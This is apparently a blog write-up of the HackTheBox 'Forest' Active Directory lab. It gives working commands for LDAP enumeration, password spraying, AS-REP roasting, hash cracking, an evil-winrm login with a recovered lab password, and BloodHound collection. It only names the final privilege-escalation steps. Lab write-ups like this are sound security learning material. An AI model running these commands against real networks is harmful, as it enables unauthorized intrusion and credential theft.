HackTheBox | Forest

This is actually the first AD box I’ve ever done.

Let’s start with an Nmap scan on the target:

nmap -A -T4 -p- 10.129.100.144 > forestnmap.txt

After it’s complete we just need to cat out the txt file.

Since we know the domain, let’s try out ldapsearch to check for anonymous authentication. Since we can query the domain anonymously, null bind is enabled.

ldapsearch -h 10.129.100.144 -x -b “dc=htb,dc=local” > forestldap.txt

There is a ton of information here. The first thing I did was try to find any and all account names.

cat forestldap.txt | grep sAMAccountName | sort -u

Still a ton of unique account names here. Off the rip the interesting ones appear to be: andy, lucinda, mark, santi, and sebastien

To clean the ldapsearch return up, let’s change our initial command a bit

ldapsearch -h 10.129.100.144 -x -b “dc=htb,dc=local” ‘(objectClass=user)’ > forestldapusers.txt

Thankfully, all of our identified users are at the bottom of this return.

This includes a slew of information, including emails for each user. Let’s create a username list out of this information to try some password attacks.

cat forestldapusers.txt | grep sAMAccountName | awk ‘{print $2}’ | tail -5 > forestusernames.txt

Let’s get this started.

crackmapexec smb 10.129.100.144 -u forestusernames.txt -p ~/tools/rockyou.txt

Now we can attempt to use an impacket script, specifically GetNPUsers.py. This will look for users that don’t require Kerberos pre-auth. We actually got a hit for another account running this.

python3 GetNPUsers.py -dc-ip 10.129.100.144 -request ‘htb.local/’

As well, we get a hash.

John cracks this pretty quick.

john svchast.txt — wordlist=~/tools/rockyou.txt

To say I got a little stuck here is an understatement. I ended up running nmap again with a less aggressive scan.

nmap -T4 -p- 10.129.100.144

This led me into WinRM. I actually wasn’t aware it would read as HTTP with -sV. At this point I also stopped the password attack.

evil-winrm -u svc-alfresco -p s3rvice -i 10.129.100.144

Now we retrieve the user flag.

Privilege escalation time. For the sake of keeping it classy, let’s use BloodHound.

bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.129.95.210

For some reason, no matter how many times I ran this, the groups file that was generated was always empty.

After taking a break and coming back later, I decided I would try running the exe version of the tool directly on the system. I ended up hosting it with impacket and utilizing New-PSDrive to move the file over.

Finally, after ingesting this into BloodHound, it worked.

The most interesting part was this:

Let’s add a new user now.

Now we need PowerView.

To finish this off, we can run secretsdump.

Now let’s connect with the hash for administrator.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store